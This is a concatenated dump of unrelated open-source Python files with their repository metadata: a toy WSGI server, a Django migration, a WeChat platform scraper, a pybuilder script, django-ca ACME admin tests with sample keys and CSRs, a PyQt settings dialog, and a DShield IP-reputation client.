from wsgiref.simple_server import make_server
from Controller import Admin, Account
"""
def index():
html = "return index page"
return html
def login():
html = "return login page"
return html
"""
urls = (
("/index/", Admin.index),
("/login/", Account.login),
)
def Request_Hndele(env, response):
response("200 OK", [("Content-Type", "text/html")])
userurl=env["PATH_INFO"]
for item in urls:
if item[0] == userurl:
return item[1]()
return "404"
if __name__ == "__main__":
httpd = make_server("",8000,Request_Hndele)
print "start web server start 8000"
httpd.serve_forever()
|
zhengjue/mytornado
|
mydjiango/django_study/webframe/index.py
|
Python
|
gpl-3.0
| 832
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-17 09:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='question',
old_name='put_date',
new_name='pub_date',
),
migrations.RenameField(
model_name='question',
old_name='qustion_text',
new_name='question_text',
),
]
|
wanglzh/django-study
|
polls/migrations/0002_auto_20171017_1706.py
|
Python
|
gpl-3.0
| 574
|
from .client import TelegramClient
|
Kurpilyansky/street-agitation-telegram-bot
|
telegram_client/__init__.py
|
Python
|
gpl-3.0
| 35
|
#!/usr/bin/env python
# coding: UTF-8
import json
import hashlib
import re
import random
import json
import requests
import logging
DEBUG_LEVEL = logging.DEBUG
try:
import colorizing_stream_handler
root = logging.getLogger()
root.setLevel(DEBUG_LEVEL)
root.addHandler(colorizing_stream_handler.ColorizingStreamHandler())
except Exception, e:
print 'can not import colorizing_stream_handler, using logging.StreamHandler()'
root = logging.getLogger()
root.setLevel(DEBUG_LEVEL)
root.addHandler(logging.StreamHandler())
'''base exception class.
'''
class WeixinPublicError(Exception):
pass
'''raise when cookies expired.
'''
class WeixinNeedLoginError(WeixinPublicError):
pass
'''rasie when unenable to login.
'''
class WeixinLoginError(WeixinPublicError):
pass
class WeixinPublic(object):
def __init__(self, account, pwd, token = None, cookies = None, ifencodepwd = False):
self.account = account
if ifencodepwd:
self.pwd = pwd
else:
self.pwd = hashlib.md5(pwd).hexdigest()
self.wx_cookies = cookies
self.lastmsgid = 0
self.token = token
if self.token == None or self.wx_cookies == None:
self.token = ''
self.wx_cookies = ''
self.login()
'''login to weichat, get token and cookies.
Raise:
WeixinLoginError, when can not get token from respond.
'''
def login(self):
url = 'https://mp.weixin.qq.com/cgi-bin/login?lang=zh_CN'
payload = {
'username' : self.account,
'imgcode' : '',
'f' : 'json',
'pwd' : self.pwd,
}
headers = {
'x-requested-with' : 'XMLHttpRequest',
'referer' : 'https://mp.weixin.qq.com/cgi-bin/loginpage?t=wxm2-login&lang=zh_CN',
}
r = requests.post(url, data = payload, headers = headers)
logging.info('------login------')
logging.debug("respond:\t%s"%r.text)
s = re.search(r'token=(\d+)', r.text)
if not s:
logging.error('Login Error!!!')
raise Exception("Login error.")
self.token = int(s.group(1))
logging.debug('token:\t%d'%self.token)
self.wx_cookies = ''
for cookie in r.cookies:
self.wx_cookies += cookie.name + '=' + cookie.value + ';'
logging.debug('cookies:\t%s'%self.wx_cookies)
logging.info('------end login------')
'''get message list.
raise:
WeixinNeedLoginError, when need re-login.
returns:
messages in dict.
'''
def get_msg_list(self):
logging.info('------get_msg_list------')
url = 'https://mp.weixin.qq.com/cgi-bin/message?t=message/list&token=%s&count=20&day=7'%self.token
payload = {
't':'message/list',
'token':self.token,
'count':20,
'day':7,
}
headers = {
'x-requested-with' : 'XMLHttpRequest',
'referer' : 'https://mp.weixin.qq.com/cgi-bin/loginpage?t=wxm2-login&lang=zh_CN',
'cookie' : self.wx_cookies,
}
r = requests.get(url, data = payload, headers = headers)
c = "".join(r.text.split())
s = re.search(r'list:\((.*)\).msg_item', c)
if s == None:
logging.error('need re-login')
raise WeixinNeedLoginError('need re-login')
else:
msg_list = s.group(1)
logging.debug('msg_list:\t%s'%msg_list)
return msg_list
logging.info('------end get_msg_list------')
'''get user icon.
Args:
fakeid.
uri, local uri to store this img.
'''
def get_user_icon(self, fakeid = 1155750780, uri = ''):
logging.info('------get_user_icon------')
url = "https://mp.weixin.qq.com/misc/getheadimg"
payload = {
'token':self.token,
'fakeid':fakeid,
}
headers = {
'Cookie':self.wx_cookies,
}
r = requests.get(url, params = payload, headers = headers)
respond_headers = r.headers
if 'content-type' in respond_headers.keys() and not respond_headers['content-type'] == 'image/jpeg':
logging.error('download user icon error, need re-login.')
raise WeixinNeedLoginError('download user icon error, need re-login.')
if uri == '':
f = open('%d.jpg'%(fakeid),'wb+')
else:
f = open('%s/%d.jpg'%(uri, fakeid),'wb+')
f.write(r.content)
f.close()
logging.info('------end get_user_icon------')
if __name__ == '__main__':
weixin = WeixinPublic("微信公众平台账户名","密码")
weixin.get_msg_list()
weixin.get_user_icon()
|
PyJulie/Some_Python_Scripts
|
get_users.py
|
Python
|
gpl-3.0
| 5,096
|
# -*- coding: utf-8 -*-
# This file is part of the hdnet package
# Copyright 2014 the authors, see file AUTHORS.
# Licensed under the GPLv3, see file LICENSE for details
# pybuilder script
from pybuilder.core import init, task, description, depends, use_plugin
# set pythonpath (for unittests)
import sys
import os
sys.path.insert(0, os.path.dirname(__file__))
# plugins
use_plugin("python.core")
use_plugin("python.pylint")
#use_plugin("python.flake8")
use_plugin("python.unittest")
#use_plugin("python.coverage")
use_plugin("python.distutils")
use_plugin("python.install_dependencies")
use_plugin("python.sphinx")
use_plugin("source_distribution")
use_plugin("copy_resources")
use_plugin("filter_resources")
# global config
name = "hdnet"
default_task = "release"
@init
def initialize(project):
project.version = '1.0dev'
# scripts path in egg
#project.set_property("dir_dist_scripts", 'scripts')
# build requirements
#project.build_depends_on_requirements("requirements-dev.txt")
# dist requirements
#project.depends_on_requirements("requirements.txt")
# core python
project.set_property('dir_source_main_python', 'hdnet')
project.set_property('dir_source_main_scripts', 'internal/scripts')
#project.set_property('dir_dist', '$dir_target/dist/$name-$version')
# pylint
#project.set_property('pylint_options', ["--max-line-length=100", "--no-docstring-rgx=.*"])
# flake8
#project.set_property('flake8_ignore', "F403,W404,W801")
project.set_property('flake8_include_test_sources', True)
#project.set_property('flake8_exclude_patterns', '.svn,CVS,.bzr,.hg,.git,__pycache__')
# unit tests
project.set_property('dir_source_unittest_python', 'tests')
project.set_property('unittest_module_glob', 'test_*')
# coverage
#project.set_property('coverage_break_build', False)
# sphinx
project.set_property('sphinx_config_path', 'doc')
project.set_property('sphinx_source_dir', 'doc')
project.set_property('sphinx_output_dir', 'doc/_build')
# copy resources (non source files)
project.set_property('copy_resources_glob', ['doc/_build/html/*', 'README.md'])
# filter resources (placeholder replacement)
# {variable} replaced by project.variable
project.set_property('filter_resources_glob', ['doc/_build/html/*.html', 'README.md'])
@task
@description('Release new version of hdnet')
@depends('prepare', 'sphinx_generate_documentation', 'publish')
def release(project, logger):
logger.info("Greetings master. I successfully built {0} in version {1}!".format(project.name, project.version))
|
team-hdnet/hdnet
|
build.py
|
Python
|
gpl-3.0
| 2,625
|
# This file is part of django-ca (https://github.com/mathiasertl/django-ca).
#
# django-ca is free software: you can redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# django-ca is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with django-ca. If not,
# see <http://www.gnu.org/licenses/>
"""Test cases for ModelAdmin classes for ACME models."""
import typing
from django.test import TestCase
from django.utils import timezone
from ..models import AcmeAccount
from ..models import AcmeAuthorization
from ..models import AcmeCertificate
from ..models import AcmeChallenge
from ..models import AcmeOrder
from ..models import CertificateAuthority
from .base import override_tmpcadir
from .base.mixins import StandardAdminViewTestCaseMixin
from .base.typehints import DjangoCAModelTypeVar
PEM1 = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvP5N/1KjBQniyyukn30E
tyHz6cIYPv5u5zZbHGfNvrmMl8qHMmddQSv581AAFa21zueS+W8jnRI5ISxER95J
tNad2XEDsFINNvYaSG8E54IHMNQijVLR4MJchkfMAa6g1gIsJB+ffEt4Ea3TMyGr
MifJG0EjmtjkjKFbr2zuPhRX3fIGjZTlkxgvb1AY2P4AxALwS/hG4bsxHHNxHt2Z
s9Bekv+55T5+ZqvhNz1/3yADRapEn6dxHRoUhnYebqNLSVoEefM+h5k7AS48waJS
lKC17RMZfUgGE/5iMNeg9qtmgWgZOIgWDyPEpiXZEDDKeoifzwn1LO59W8c4W6L7
XwIDAQAB
-----END PUBLIC KEY-----"""
PEM2 = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAp8SCUVQqpTBRyryuu560
Q8cAi18Ac+iLjaSLL4gOaDEU9CpPi4l9yCGphnQFQ92YP+GWv+C6/JRp24852QbR
RzuUJqJPdDxD78yFXoxYCLPmwQMnToA7SE3SnZ/PW2GPFMbAICuRdd3PhMAWCODS
NewZPLBlG35brRlfFtUEc2oQARb2lhBkMXrpIWeuSNQtInAHtfTJNA51BzdrIT2t
MIfadw4ljk7cVbrSYemT6e59ATYxiMXalu5/4v22958voEBZ38TE8AXWiEtTQYwv
/Kj0P67yuzE94zNdT28pu+jJYr5nHusa2NCbvnYFkDwzigmwCxVt9kW3xj3gfpgc
VQIDAQAB
-----END PUBLIC KEY-----"""
ACME_SLUG_1 = "Mr6FfdD68lzx"
ACME_SLUG_2 = "DzW4PQ6L76Px"
THUMBPRINT1 = "U-yUM27CQn9pClKlEITobHB38GJOJ9YbOxnw5KKqU-8"
THUMBPRINT2 = "s_glgc6Fem0CW7ZioXHBeuUQVHSO-viZ3xNR8TBebCo"
TOKEN1 = "grhuo1-ZmUMD8_53lQMlUN1WeURMpYkSGq5_4r-1S7JNVF3a25_xcA2K3dGtyGjt"
TOKEN2 = "3vmQafd29ROOktb7wJO_kZ8bIBlqoasegI9ElyLVRyMre_OyEPvjKjkQRxfzWprS"
TOKEN3 = "gY-kE5LdgwZyFeUCbjQKaX5Eo2lMsgabeB-m8zQ6eirhJP1WpVhenAyB7Yn-7BIq"
CSR1 = "MIICbDCCAVQCAQIwADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKZoFq9UCNpCAfqNrdD2za8W9xuS6PTZzE13iitAbex75cs894cyhvNvBsJgreQ0ZTzvEy9FDB7CSBKQebsnewcETG4v2E4QyhvEBsWEzlIYNmlXxwkQXoxy3vm4bavxIcya5Db9HPw0oo0wqUWyx_GsEu0hRGY-Ys9VPuq81w60kHiXhcwv2PQtgiDtJ-VJ4xycYMRyAzYr_R13YzMa4gXUf7Hk4hDPitG28VyVcO8f5CR0ogtzA0C3r1SdwceJog1YgQfHLbgOUDsQhfbUrBAR7Iq_3K-txkxVtzwZedjCFGjNXe4CIL6e-NDo5nbFyuNseCQjP7TXfvQxhtrCIlECAwEAAaAnMCUGCSqGSIb3DQEJDjEYMBYwFAYDVR0RBA0wC4IJbG9jYWxob3N0MA0GCSqGSIb3DQEBCwUAA4IBAQArIgdF2oMuxtHSgNrAk1_stu1bmXrr9dZ-ewbkgBaMq_o5PGh7OY3TFcF-7Uk-lbuCayHX-FcNe7X8dPiWg62ajzR_RROGGII0QiROe1Z77jtJuurE1MXnzkgYuE0JU0_9luAHHQFSCv9Nr6rO8Xy6otZfcolqwtWzSf7puOiQ5fC6Jdq5W4UAvlBfO7mqlhO7G_XCcSuzjSa1OcWSgd9zsp5Z-xYpL_4EgqXCiUsMCZ0sLhH2FuEkTw_tPEgRVUBz0ro51jijmG2Mg2N3irGv58IoElz3_NwWQewpfkIKEWzWcoG31sFJxEJapi_NuwdYAcKvYFNdPMH994rNKVjL" # NOQA: E501
CSR2 = "MIICbDCCAVQCAQIwADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALpIUHFIMXJSJ6YfoTsDRUgut6AY6sdhprPBumVdJXoBbDUjSW4R1aJuXPXmQMDRo-D5Tkvxx7rxsWnOG3l3-vZi18Ortk27k_5f-6_7OdoujijZFYxq0T0hVvgDh47r-aY67q0-CfTNfCYRfAkbOZ8UpAbV6u0vynguHznacIywl2NB5wmlDTLBo0CYp2ElRDfaj-Syhh6fwMTpDXs43wQJelJvDjOgMAPbcW1CiSnamIt3nSxwQjSOrAs6r-nIZblgPsQCvjjuF55okC4tjDqMSk2Qtq5bQwh9OO-AX9xTFCBeH8rqycqgPkIustUsFJEbOayQa4w2JWumgysFATkCAwEAAaAnMCUGCSqGSIb3DQEJDjEYMBYwFAYDVR0RBA0wC4IJbG9jYWxob3N0MA0GCSqGSIb3DQEBCwUAA4IBAQAxc3zi_S79F_M5I8SFR4IOfJOt1pU1z6tsGNcVeK_vN-8jCMuQiicBlEwcauxox7KO1czMFX_Ikq-W_ctc2RhqfD4GsU80KDrDLQarZ1KC6egSXrHcuYqTeqRdNtnExCCrzRlUzaB5kojUpmdnRJ48rFgoLHuTxPd47vqTQahzx0xl3xhM-VQmQFc-urvIcyYNR620qA9b84lOwmzT9duRjYIrAS1H2vRatNqRU8tDAhbuvu-_yU_U0lo3gQcK5NGLVR45qU-yr0SgYIKgfkL6E6W9B80xT5Qt4Py7WZCSvrUOLC2uco_jDODrY-xCky7Tbalu1_FEzF-nkSEDK_x0" # NOQA: E501
class AcmeAdminTestCaseMixin(
StandardAdminViewTestCaseMixin[DjangoCAModelTypeVar], typing.Generic[DjangoCAModelTypeVar]
):
"""Admin view mixin that creates all model instances for ACME."""
load_cas = (
"root",
"child",
)
cas: typing.Dict[str, CertificateAuthority]
def setUp(self) -> None: # pylint: disable=invalid-name,missing-function-docstring
super().setUp()
kid1 = self.absolute_uri(":acme-account", serial=self.cas["child"].serial, slug=ACME_SLUG_1)
account1 = AcmeAccount.objects.create(
ca=self.cas["child"],
contact=f"mailto:{self.user.email}",
status=AcmeAccount.STATUS_VALID,
kid=kid1,
terms_of_service_agreed=True,
pem=PEM1,
thumbprint=THUMBPRINT1,
slug=ACME_SLUG_1,
)
kid2 = self.absolute_uri(":acme-account", serial=self.cas["root"].serial, slug=ACME_SLUG_1)
account2 = AcmeAccount.objects.create(
ca=self.cas["root"],
contact=f"mailto:{self.user.email}",
status=AcmeAccount.STATUS_REVOKED,
kid=kid2,
terms_of_service_agreed=False,
pem=PEM2,
thumbprint=THUMBPRINT2,
slug=ACME_SLUG_2,
)
self.order1 = AcmeOrder.objects.create(account=account1, status=AcmeOrder.STATUS_VALID)
self.order2 = AcmeOrder.objects.create(account=account2, status=AcmeOrder.STATUS_PROCESSING)
auth1 = AcmeAuthorization.objects.create(
order=self.order1,
type=AcmeAuthorization.TYPE_DNS,
value="example.com",
status=AcmeAuthorization.STATUS_PENDING,
wildcard=True,
)
auth2 = AcmeAuthorization.objects.create(
order=self.order2,
type=AcmeAuthorization.TYPE_DNS,
value="example.net",
status=AcmeAuthorization.STATUS_VALID,
wildcard=False,
)
AcmeChallenge.objects.create(auth=auth1, status=AcmeChallenge.STATUS_PENDING, token=TOKEN1)
AcmeChallenge.objects.create(
auth=auth2,
status=AcmeChallenge.STATUS_VALID,
token=TOKEN2,
validated=timezone.now(),
type=AcmeChallenge.TYPE_HTTP_01,
)
AcmeChallenge.objects.create(
auth=auth2,
status=AcmeChallenge.STATUS_INVALID,
token=TOKEN3,
error="some-error",
type=AcmeChallenge.TYPE_DNS_01,
)
AcmeCertificate.objects.create(order=self.order1)
AcmeCertificate.objects.create(order=self.order2, csr=CSR1)
class AcmeAccountViewsTestCase(AcmeAdminTestCaseMixin[AcmeAccount], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeAccount`."""
model = AcmeAccount
class AcmeOrderViewsTestCase(AcmeAdminTestCaseMixin[AcmeOrder], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeOrder`."""
model = AcmeOrder
@override_tmpcadir()
def test_expired_filter(self) -> None:
"""Test the "expired" list filter."""
self.assertChangelistResponse(
self.client.get(f"{self.changelist_url}?expired=0"), self.order1, self.order2
)
self.assertChangelistResponse(self.client.get(f"{self.changelist_url}?expired=1"))
with self.freeze_time("everything_expired"):
self.assertChangelistResponse(self.client.get(f"{self.changelist_url}?expired=0"))
self.assertChangelistResponse(
self.client.get(f"{self.changelist_url}?expired=1"), self.order1, self.order2
)
class AcmeAuthorizationViewsTestCase(AcmeAdminTestCaseMixin[AcmeAuthorization], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeAuthorization`."""
model = AcmeAuthorization
class AcmeChallengeViewsTestCase(AcmeAdminTestCaseMixin[AcmeChallenge], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeChallenge`."""
model = AcmeChallenge
class AcmeCertificateViewsTestCase(AcmeAdminTestCaseMixin[AcmeCertificate], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeCertificate`."""
model = AcmeCertificate
|
mathiasertl/django-ca
|
ca/django_ca/tests/tests_admin_acme.py
|
Python
|
gpl-3.0
| 8,514
|
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QVBoxLayout, QTreeWidget,
QStackedWidget)
from AlphaHooks.widgets.collections import Populate
from AlphaHooks.windows.settings.root import ConsoleSettings
class SettingsDialog(QWidget):
"""
Settings dialog opened from File -> Settings...
"""
def __init__(self, config, parent=None):
super(SettingsDialog, self).__init__(parent)
self.config = config
# Widgets
self.console = ConsoleSettings(self.config)
# Settings
self.widget_connections = {
"Console": self.console
}
# Settings Tree
self.settings_tree = QTreeWidget()
self.settings_tree.setColumnCount(2)
self.settings_tree.header().hideSection(1)
self.settings_tree.header().close()
# Settings Stacked Widget
self.stack = QStackedWidget()
self.populate = Populate(self, display=self.stack)
self.populate.tree_widget(
self.settings_tree.invisibleRootItem(),
self.widget_connections
)
# Layouts
self.tree_layout = QVBoxLayout()
self.tree_layout.addWidget(self.settings_tree)
self.horizontal_layout = QHBoxLayout()
self.horizontal_layout.addLayout(self.tree_layout)
self.horizontal_layout.addWidget(self.stack)
self.setLayout(self.horizontal_layout)
# Slots
self.settings_tree.currentItemChanged.connect(self.display)
def display(self, current):
"""
Show the corresponding widget for the selected tree item.
:param current: the current tree item
"""
try:
item_connection = int(current.text(1))
self.stack.setCurrentIndex(item_connection)
except ValueError as _:
pass
|
AlphaHooks/AlphaHooks
|
AlphaHooks/windows/settings/config.py
|
Python
|
gpl-3.0
| 1,856
|
from __future__ import absolute_import, division, print_function, unicode_literals
import gevent.monkey
gevent.monkey.patch_socket()
from datetime import datetime
import isodate
import requests
from xml.etree.cElementTree import XMLParser
from .base import *
from frontend.presentation import *
class DShieldDataProvider(DataProvider):
def _handle_date(value):
if value == "0":
return None
return datetime.strptime(value, "%Y-%m-%d").date()
def _handle_datetime(value):
if value == "0":
return None
return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
@classmethod
def _parse(cls, data):
# Produce an AttributeList from the data
info = AttributeList()
for key, newkey, fn in cls._handlers:
value = data.get(key)
if value != None:
newvalue = fn(value)
if newvalue != None:
info.append((newkey, newvalue))
# Determine a disposition and return the InformationSet
attacks = int(data["attacks"]) if "attacks" in data else None
if attacks == None:
disp = DISP_INFORMATIONAL
elif attacks < 10:
disp = DISP_NEGATIVE
elif attacks > 50:
disp = DISP_POSITIVE
else:
disp = DISP_INDETERMINATE
return InformationSet(disp, info)
@property
def name(self):
return "dshield"
def _query(self, target, qtype):
if qtype not in (QUERY_IPV4, QUERY_IPV6):
return None
endpoint = self._endpoint.format(target)
r = requests.get(endpoint)
r.raise_for_status()
xp = XMLParser(encoding="utf-8")
xp.feed(r.text.encode("utf-8"))
root = xp.close()
data = {}
for e in root:
if e.text == None:
continue
tag = e.tag.decode("utf-8")
value = e.text.decode("utf-8").strip()
if len(value) != 0:
data[tag] = value
return self._parse(data)
_endpoint = "http://www.dshield.org/api/ip/{0}"
_handlers = [
("mindate", "first_event_ts", _handle_date),
("maxdate", "last_event_ts", _handle_date),
("updated", "update_ts", _handle_datetime),
("count", "n_attack_packets", int),
("attacks", "n_attack_targets", int),
("country", "country", lambda x: x),
("as", "as_number", int),
("asname", "as_name", lambda x: x),
("network", "network_prefix", lambda x: x),
("comment", "comment", lambda x: x),
("abusecontact", "abuse_contact", lambda x: x)
]
__all__ = [
b"DShieldDataProvider"
]
|
slupers/ThreatIntel
|
ThreatIntel/backend/dshield.py
|
Python
|
gpl-3.0
| 2,738
|